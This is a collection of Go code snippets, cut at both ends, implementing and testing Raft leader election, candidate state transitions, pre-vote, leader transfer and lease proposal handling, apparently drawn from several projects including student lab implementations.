Term\n\t\tr.resetVotes()\n\t\tr.myCV.CurrentTerm += 1 //increment current Term\n\t\tr.myCV.VotedFor = r.Myconfig.Id //Vote for self\n\t\tr.WriteCVToDisk() //write Current Term and VotedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].Vote = true //vote true\n\t\treqVoteObj := r.prepRequestVote() //prepare request Vote obj\n\t\tr.sendToAll(reqVoteObj) //send requests for Vote to all servers\n\t\tResendVoteTimer := r.StartTimer(ResendVoteTimeOut, resendTime)\n\t\tfor { //this loop for reading responses from all servers\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase ClientAppendReq: ///candidate must also respond as false just like follower\n\t\t\t\trequest := req.(ClientAppendReq) //explicit typecasting\n\t\t\t\tresponse := ClientAppendResponse{}\n\t\t\t\tlogItem := LogItem{r.CurrentLogEntryCnt, false, request.Data} //lsn is count started from 0\n\t\t\t\tr.CurrentLogEntryCnt += 1\n\t\t\t\tresponse.LogEntry = logItem\n\t\t\t\tr.CommitCh <- &response.LogEntry\n\t\t\tcase RequestVoteResponse: //got the Vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\tif response.VoteGranted {\n\t\t\t\t\tr.f_specific[response.Id].Vote = true\n\t\t\t\t}\n\t\t\t\tVoteCount := r.countVotes()\n\t\t\t\tif VoteCount >= majority {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of Votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\tretVal := r.serviceAppendEntriesReq(request, nil, 0, candidate)\n\t\t\t\tif retVal == follower {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t}\n\n\t\t\tcase RequestVote:\n\t\t\t\trequest := req.(RequestVote)\n\t\t\t\t//==Can be shared with service request vote with additinal param of caller(candidate or follower)\n\t\t\t\tresponse := RequestVoteResponse{} //prep response object,for responding back to requester\n\t\t\t\tcandidateId := request.CandidateId\n\t\t\t\tresponse.Id = r.Myconfig.Id\n\t\t\t\tif r.isDeservingCandidate(request) {\n\t\t\t\t\tresponse.VoteGranted = true\n\t\t\t\t\tr.myCV.VotedFor = candidateId\n\t\t\t\t\tr.myCV.CurrentTerm = request.Term\n\t\t\t\t\tif request.Term > r.myCV.CurrentTerm { //write to disk only when value has changed\n\t\t\t\t\t\tr.WriteCVToDisk()\n\t\t\t\t\t}\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\tresponse.VoteGranted = false\n\t\t\t\t}\n\t\t\t\tresponse.Term = r.myCV.CurrentTerm\n\t\t\t\tr.send(candidateId, response)\n\n\t\t\tcase int:\n\t\t\t\ttimeout := req.(int)\n\t\t\t\tif timeout == ResendVoteTimeOut {\n\t\t\t\t\trT := msecs * time.Duration(resendTime)\n\t\t\t\t\tResendVoteTimer.Reset(rT)\n\t\t\t\t\treqVoteObj := r.prepRequestVote() //prepare request Vote agn and send to all, ones rcvg the vote agn will vote true agn so won't matter and countVotes func counts no.of true entries\n\t\t\t\t\tr.sendToAll(reqVoteObj)\n\t\t\t\t} else if timeout == ElectionTimeout {\n\t\t\t\t\twaitTime_msecs := msecs * time.Duration(waitTime)\n\t\t\t\t\tElectionTimer.Reset(waitTime_msecs)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func TestFreeStuckCandidateWithCheckQuorum(t *testing.T) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(a)\n\tdefer closeAndFreeRaft(b)\n\tdefer closeAndFreeRaft(c)\n\n\ta.checkQuorum = true\n\tb.checkQuorum = true\n\tc.checkQuorum = true\n\n\tnt := newNetwork(a, b, c)\n\tsetRandomizedElectionTimeout(b, b.electionTimeout+1)\n\n\tfor i := 0; i < b.electionTimeout; i++ {\n\t\tb.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(1)\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+1 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+1)\n\t}\n\n\t// Vote again for safety\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+2 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+2)\n\t}\n\n\tnt.recover()\n\tnt.send(pb.Message{From: 1, To: 3, Type: pb.MsgHeartbeat, Term: a.Term})\n\n\t// Disrupt the leader so that the stuck peer is freed\n\tif a.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateFollower)\n\t}\n\n\tif c.Term != a.Term {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, a.Term)\n\t}\n\n\t// Vote again, should become leader this time\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif c.state != StateLeader {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", c.state, StateLeader)\n\t}\n\n}", "func TestPreVoteWithSplitVote(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// simulate leader down. followers start split vote.\n\tnt.isolate(1)\n\tnt.send([]pb.Message{\n\t\t{From: 2, To: 2, Type: pb.MsgHup},\n\t\t{From: 3, To: 3, Type: pb.MsgHup},\n\t}...)\n\n\t// check whether the term values are expected\n\t// n2.Term == 3\n\t// n3.Term == 3\n\tsm := nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\t// check state\n\t// n2 == candidate\n\t// n3 == candidate\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\n\t// node 2 election timeout first\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// n2.Term == 4\n\t// n3.Term == 4\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 4)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 4)\n\t}\n\n\t// check state\n\t// n2 == leader\n\t// n3 == follower\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n}", "func (r *Raft) runCandidate() {\n\t// Start vote for us, and set a timeout\n\tvoteCh := r.electSelf()\n\telectionTimeout := randomTimeout(r.conf.ElectionTimeout, 2*r.conf.ElectionTimeout)\n\n\t// Tally the votes, need a simple majority\n\tgrantedVotes := 0\n\tquorum := r.quorumSize()\n\tr.logD.Printf(\"Cluster size: %d, votes needed: %d\", len(r.peers)+1, quorum)\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Candidate state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\n\t\t// Got response from peers on voting request\n\t\tcase vote := <-voteCh:\n\t\t\t// Check if the term is greater than ours, bail\n\t\t\tif vote.Term > r.getCurrentTerm() {\n\t\t\t\tr.logD.Printf(\"Newer term discovered\")\n\t\t\t\tr.setState(Follower)\n\t\t\t\tif err := r.setCurrentTerm(vote.Term); err != nil {\n\t\t\t\t\tr.logE.Printf(\"Failed to update current term: %w\", err)\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Check if the vote is granted\n\t\t\tif vote.Granted {\n\t\t\t\tgrantedVotes++\n\t\t\t\tr.logD.Printf(\"Vote granted. Tally: %d\", grantedVotes)\n\t\t\t}\n\n\t\t\t// Check if we've become the leader\n\t\t\tif grantedVotes >= quorum {\n\t\t\t\tr.logD.Printf(\"Election won. Tally: %d\", grantedVotes)\n\t\t\t\tr.setState(Leader)\n\t\t\t\treturn\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\n\t\tcase <-electionTimeout:\n\t\t\t// Election failed! Restart the election. We simply return,\n\t\t\t// which will kick us back into runCandidate\n\t\t\tr.logW.Printf(\"Election timeout reached, restarting election\")\n\t\t\treturn\n\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func TestNodeWithSmallerTermCanCompleteElection(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\t// cause a network partition to isolate node 3\n\tnt := newNetwork(n1, n2, n3)\n\tnt.cut(1, 3)\n\tnt.cut(2, 3)\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// a.Term == 3\n\t// b.Term == 3\n\t// c.Term == 1\n\tsm = nt.peers[1].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 1 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 1 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 1)\n\t}\n\n\t// check state\n\t// a == follower\n\t// b == leader\n\t// c == pre-candidate\n\tsm = nt.peers[1].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tsm.logger.Infof(\"going to bring back peer 3 and kill peer 2\")\n\t// recover the network then immediately isolate b which is currently\n\t// the leader, this is to emulate the crash of b.\n\tnt.recover()\n\tnt.cut(2, 1)\n\tnt.cut(2, 3)\n\n\t// call for election\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// do we have a leader?\n\tsma := nt.peers[1].(*raft)\n\tsmb := nt.peers[3].(*raft)\n\tif sma.state != StateLeader && smb.state != StateLeader {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func TestProposalBufferRejectLeaseAcqOnFollower(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\tctx := context.Background()\n\n\tself := uint64(1)\n\t// Each subtest will try to propose a lease acquisition in a different Raft\n\t// scenario. Some proposals should be allowed, some should be rejected.\n\tfor _, tc := range []struct {\n\t\tname string\n\t\tstate raft.StateType\n\t\t// raft.None means there's no leader, or the leader is unknown.\n\t\tleader uint64\n\t\t// Empty means VOTER_FULL.\n\t\tleaderRepType roachpb.ReplicaType\n\t\t// Set to simulate situations where the local replica is so behind that the\n\t\t// leader is not even part of the range descriptor.\n\t\tleaderNotInRngDesc bool\n\t\t// If true, the follower has a valid lease.\n\t\townsValidLease bool\n\n\t\texpRejection bool\n\t}{\n\t\t{\n\t\t\tname: \"leader\",\n\t\t\tstate: raft.StateLeader,\n\t\t\tleader: self,\n\t\t\t// No rejection. The leader can request a lease.\n\t\t\texpRejection: false,\n\t\t},\n\t\t{\n\t\t\tname: \"follower, known eligible leader\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Someone else is leader.\n\t\t\tleader: self + 1,\n\t\t\t// Rejection - a follower can't request a lease.\n\t\t\texpRejection: true,\n\t\t},\n\t\t{\n\t\t\tname: \"follower, lease extension despite known eligible leader\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Someone else is leader, but we're the leaseholder.\n\t\t\tleader: self + 1,\n\t\t\townsValidLease: true,\n\t\t\t// No rejection of lease extensions.\n\t\t\texpRejection: false,\n\t\t},\n\t\t{\n\t\t\tname: \"follower, known ineligible leader\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Someone else is leader.\n\t\t\tleader: self + 1,\n\t\t\t// The leader type makes it ineligible to get the lease. Thus, the local\n\t\t\t// proposal will not be rejected.\n\t\t\tleaderRepType: roachpb.VOTER_DEMOTING_LEARNER,\n\t\t\texpRejection: false,\n\t\t},\n\t\t{\n\t\t\t// Here we simulate the leader being known by Raft, but the local replica\n\t\t\t// is so far behind that it doesn't contain the leader replica.\n\t\t\tname: \"follower, known leader not in range descriptor\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Someone else is leader.\n\t\t\tleader: self + 1,\n\t\t\tleaderNotInRngDesc: true,\n\t\t\t// We assume that the leader is eligible, and redirect.\n\t\t\texpRejection: true,\n\t\t},\n\t\t{\n\t\t\tname: \"follower, unknown leader\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Unknown leader.\n\t\t\tleader: raft.None,\n\t\t\t// No rejection if the leader is unknown. See comments in\n\t\t\t// FlushLockedWithRaftGroup().\n\t\t\texpRejection: false,\n\t\t},\n\t} {\n\t\tt.Run(tc.name, func(t *testing.T) {\n\t\t\tvar p testProposer\n\t\t\tvar pc proposalCreator\n\t\t\t// p.replicaID() is hardcoded; it'd better be hardcoded to what this test\n\t\t\t// expects.\n\t\t\trequire.Equal(t, self, uint64(p.replicaID()))\n\n\t\t\tvar rejected roachpb.ReplicaID\n\t\t\tif tc.expRejection {\n\t\t\t\tp.onRejectProposalWithRedirectLocked = func(_ *ProposalData, redirectTo roachpb.ReplicaID) {\n\t\t\t\t\tif rejected != 0 {\n\t\t\t\t\t\tt.Fatalf(\"unexpected 2nd rejection\")\n\t\t\t\t\t}\n\t\t\t\t\trejected = redirectTo\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tp.onRejectProposalWithRedirectLocked = func(_ *ProposalData, _ roachpb.ReplicaID) {\n\t\t\t\t\tt.Fatalf(\"unexpected redirection\")\n\t\t\t\t}\n\t\t\t}\n\n\t\t\traftStatus := raft.BasicStatus{\n\t\t\t\tID: self,\n\t\t\t\tSoftState: raft.SoftState{\n\t\t\t\t\tRaftState: tc.state,\n\t\t\t\t\tLead: tc.leader,\n\t\t\t\t},\n\t\t\t}\n\t\t\tr := &testProposerRaft{\n\t\t\t\tstatus: raftStatus,\n\t\t\t}\n\t\t\tp.raftGroup = r\n\t\t\tp.leaderReplicaInDescriptor = !tc.leaderNotInRngDesc\n\t\t\tp.leaderReplicaType = tc.leaderRepType\n\t\t\tp.ownsValidLease = tc.ownsValidLease\n\n\t\t\tvar b propBuf\n\t\t\tclock := hlc.NewClock(hlc.UnixNano, time.Nanosecond)\n\t\t\ttracker := tracker.NewLockfreeTracker()\n\t\t\tb.Init(&p, tracker, clock, cluster.MakeTestingClusterSettings())\n\n\t\t\tpd, data := pc.newLeaseProposal(roachpb.Lease{})\n\t\t\t_, tok := b.TrackEvaluatingRequest(ctx, hlc.MinTimestamp)\n\t\t\t_, err := b.Insert(ctx, pd, data, tok.Move(ctx))\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.NoError(t, b.flushLocked(ctx))\n\t\t\tif tc.expRejection {\n\t\t\t\trequire.Equal(t, roachpb.ReplicaID(tc.leader), rejected)\n\t\t\t} else {\n\t\t\t\trequire.Equal(t, roachpb.ReplicaID(0), rejected)\n\t\t\t}\n\t\t\trequire.Zero(t, tracker.Count())\n\t\t})\n\t}\n}", "func TestLearnerCannotVote(t *testing.T) {\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n2)\n\n\tn2.becomeFollower(1, None)\n\n\tn2.Step(pb.Message{From: 1, To: 2, Term: 2, Type: pb.MsgVote, LogTerm: 11, Index: 11})\n\n\tif len(n2.msgs) != 0 {\n\t\tt.Errorf(\"expect learner not to vote, but received %v messages\", n2.msgs)\n\t}\n}", "func testCandidateResetTerm(t *testing.T, mt pb.MessageType) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tnt := newNetwork(a, b, c)\n\tdefer nt.closeAll()\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// isolate 3 and increase term in rest\n\tnt.isolate(3)\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\t// trigger campaign in isolated c\n\tc.resetRandomizedElectionTimeout()\n\tfor i := 0; i < c.randomizedElectionTimeout; i++ {\n\t\tc.tick()\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tnt.recover()\n\n\t// leader sends to isolated candidate\n\t// and expects candidate to revert to follower\n\tnt.send(pb.Message{From: 1, To: 3, Term: a.Term, Type: mt})\n\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// follower c term is reset with leader's\n\tif a.Term != c.Term {\n\t\tt.Errorf(\"follower term expected same term as leader's %d, got %d\", a.Term, c.Term)\n\t}\n}", "func TestLeaderTransferReceiveHigherTermVote(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\t// Transfer leadership to isolated node to let transfer pending.\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup, Index: 1, Term: 2})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n}", "func (rf *Raft) ExecuteCandidate(args *RequestVoteArgs) {\n\n\t//Send request vote to peer servers and parse response\n\tfor i, _ := range rf.peers {\n\t\tif i != rf.me {\n\t\t\treply := &RequestVoteReply{}\n\t\t\tgo rf.sendRequestVote(i, args, reply)\n\t\t}\n\t}\n}", "func Make(peers []*labrpc.ClientEnd, me int,\n persister *Persister, applyCh chan ApplyMsg) *Raft {\n rf := &Raft{}\n rf.peers = peers\n rf.persister = persister\n rf.me = me\n\n // Your initialization code here (2A, 2B, 2C).\n rf.state = StateFollower\n rf.commitIndex = 0\n rf.votedFor = nilIndex\n rf.lastApplied = 0\n rf.currentTerm = 0\n // rf.log contains a dummy head\n rf.log = []LogEntry{LogEntry{rf.currentTerm, nil}}\n\n // initialize from state persisted before a crash\n rf.readPersist(persister.ReadRaftState())\n\n rf.print(\"Initialize\")\n // All servers\n go func() {\n for {\n if rf.isKilled {\n return\n }\n rf.mu.Lock()\n for rf.commitIndex > rf.lastApplied {\n rf.lastApplied++\n applyMsg := ApplyMsg{rf.lastApplied, rf.log[rf.lastApplied].Command, false, nil}\n applyCh <- applyMsg\n rf.print(\"applied log entry %d:%v\", rf.lastApplied, rf.log[rf.lastApplied])\n // Apply rf.log[lastApplied] into its state machine\n }\n rf.mu.Unlock()\n time.Sleep(50 * time.Millisecond)\n }\n }()\n\n // candidate thread\n go func() {\n var counterLock sync.Mutex\n for {\n if rf.isKilled {\n return\n }\n rf.mu.Lock()\n\t\t\tif rf.state == StateFollower { // ONLY follower would have election timeout\n\t\t\t\trf.state = StateCandidate\n\t\t\t}\n rf.mu.Unlock()\n duration := time.Duration(electionTimeout +\n Random(-electionRandomFactor, electionRandomFactor))\n time.Sleep(duration * time.Millisecond)\n rf.mu.Lock()\n\n if rf.state == StateCandidate {\n rf.print(\"start to request votes for term %d\", rf.currentTerm+1)\n counter := 0\n logLen := len(rf.log)\n lastTerm := 0\n lastIndex := logLen-1\n requestTerm := rf.currentTerm+1\n if logLen > 0 {\n lastTerm = rf.log[logLen-1].Term\n }\n rvArgs := RequestVoteArgs{requestTerm, rf.me, lastIndex, lastTerm}\n rvReplies := make([]RequestVoteReply, len(rf.peers))\n\n for index := range rf.peers {\n go func(index int) {\n ok := rf.sendRequestVote(index, &rvArgs, &rvReplies[index])\n rf.mu.Lock()\n if rvReplies[index].Term > rf.currentTerm {\n rf.currentTerm = rvReplies[index].Term\n rf.state = StateFollower\n rf.persist()\n }else if ok && (rvArgs.Term == rf.currentTerm) && rvReplies[index].VoteGranted {\n counterLock.Lock()\n counter++\n if counter > len(rf.peers)/2 && rf.state != StateLeader {\n rf.state = StateLeader\n rf.currentTerm = requestTerm\n rf.nextIndex = make([]int, len(rf.peers))\n rf.matchIndex = make([]int, len(rf.peers))\n // immediately send heartbeats to others to stop election\n for i := range rf.peers {\n rf.nextIndex[i] = len(rf.log)\n }\n rf.persist()\n\n rf.print(\"become leader for term %d, nextIndex = %v, rvArgs = %v\", rf.currentTerm, rf.nextIndex, rvArgs)\n }\n counterLock.Unlock()\n }\n rf.mu.Unlock()\n }(index)\n }\n }\n rf.mu.Unlock()\n }\n }()\n\n // leader thread\n go func(){\n for {\n if rf.isKilled {\n return\n }\n time.Sleep(heartbeatTimeout * time.Millisecond)\n rf.mu.Lock()\n // send AppendEntries(as heartbeats) RPC\n if rf.state == StateLeader {\n currentTerm := rf.currentTerm\n for index := range rf.peers {\n go func(index int) {\n // decrease rf.nextIndex[index] in loop till append success\n for {\n if index == rf.me || rf.state != StateLeader {\n break\n }\n // if rf.nextIndex[index] <= 0 || rf.nextIndex[index] > len(rf.log){\n // rf.print(\"Error: rf.nextIndex[%d] = %d, logLen = %d\", index, rf.nextIndex[index], len(rf.log))\n // }\n rf.mu.Lock()\n logLen := len(rf.log)\n appendEntries := rf.log[rf.nextIndex[index]:]\n prevIndex := rf.nextIndex[index]-1\n aeArgs := AppendEntriesArgs{currentTerm, rf.me,\n prevIndex, rf.log[prevIndex].Term,\n appendEntries, rf.commitIndex}\n aeReply := AppendEntriesReply{}\n rf.mu.Unlock()\n\n ok := rf.sendAppendEntries(index, &aeArgs, &aeReply)\n rf.mu.Lock()\n if ok && rf.currentTerm == aeArgs.Term { // ensure the reply is not outdated\n if aeReply.Success {\n rf.matchIndex[index] = logLen-1\n rf.nextIndex[index] = logLen\n rf.mu.Unlock()\n break\n }else {\n if aeReply.Term > rf.currentTerm { // this leader node is outdated\n rf.currentTerm = aeReply.Term\n rf.state = StateFollower\n rf.persist()\n rf.mu.Unlock()\n break\n }else{ // prevIndex not match, decrease prevIndex\n // rf.nextIndex[index]--\n // if aeReply.ConflictFromIndex <= 0 || aeReply.ConflictFromIndex >= logLen{\n // rf.print(\"Error: aeReply.ConflictFromIndex from %d = %d, logLen = %d\", aeReply.ConflictFromIndex, index, logLen)\n // }\n rf.nextIndex[index] = aeReply.ConflictFromIndex\n }\n }\n }\n rf.mu.Unlock()\n }\n }(index)\n }\n\n // Find logs that has appended to majority and update commitIndex\n for N := rf.commitIndex+1; N<len(rf.log); N++ {\n // To eliminate problems like the one in Figure 8,\n // Raft never commits log entries from previous terms by count- ing replicas. \n if rf.log[N].Term < rf.currentTerm{\n continue\n }else if rf.log[N].Term > rf.currentTerm{\n break\n }\n followerHas := 0\n for index := range rf.peers {\n if rf.matchIndex[index] >= N{\n followerHas++\n }\n }\n // If majority has the log entry of index N\n if followerHas > len(rf.peers) / 2 {\n rf.print(\"set commitIndex to %d, matchIndex = %v\", N, rf.matchIndex)\n rf.commitIndex = N\n }\n }\n }\n rf.mu.Unlock()\n }\n }()\n\n return rf\n}", "func (r *Raft) becomeCandidate() {\n\tr.State = StateCandidate\n\tr.Term += 1\n\tr.votes = make(map[uint64]bool)\n\t// vote for self\n\tr.votes[r.id] = true\n\tr.Vote = r.id\n\tr.electionElapsed = 0\n\tr.randomElectionTimeout = randomTimeout(r.electionTimeout)\n\tr.voteFailCount = 0\n\n\t// Your Code Here (2A).\n}", "func (r *Raft) becomeCandidate() {\n\tr.State = StateCandidate\n\tr.Term++\n\tr.Lead = 0\n\tr.electionElapsed = 0\n\tr.actualElectionTimeout = r.generateElectionTimeout()\n\tr.votes = map[uint64]bool{}\n}", "func (rf *Raft) BeCandidate() {\n\t//////fmt.Print(\"%d becomes candidate\\n\", rf.me)\n\trf.state = Candidate\n\trf.currentTerm += 1\n\trf.votedFor = rf.me\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\t//defer rf.updateAppliedLock()\n\t//Your code here (2A, 2B).\n\tisALeader := rf.role == Leader\n\n\tif rf.updateTermLock(args.Term) && isALeader {\n\t\t//DPrintf(\"[DEBUG] Server %d from %d to Follower {requestVote : Term higher}\", rf.me, Leader)\n\t}\n\treply.VoteCranted = false\n\tvar votedFor interface{}\n\t//var isLeader bool\n\tvar candidateID, currentTerm, candidateTerm, currentLastLogIndex, candidateLastLogIndex, currentLastLogTerm, 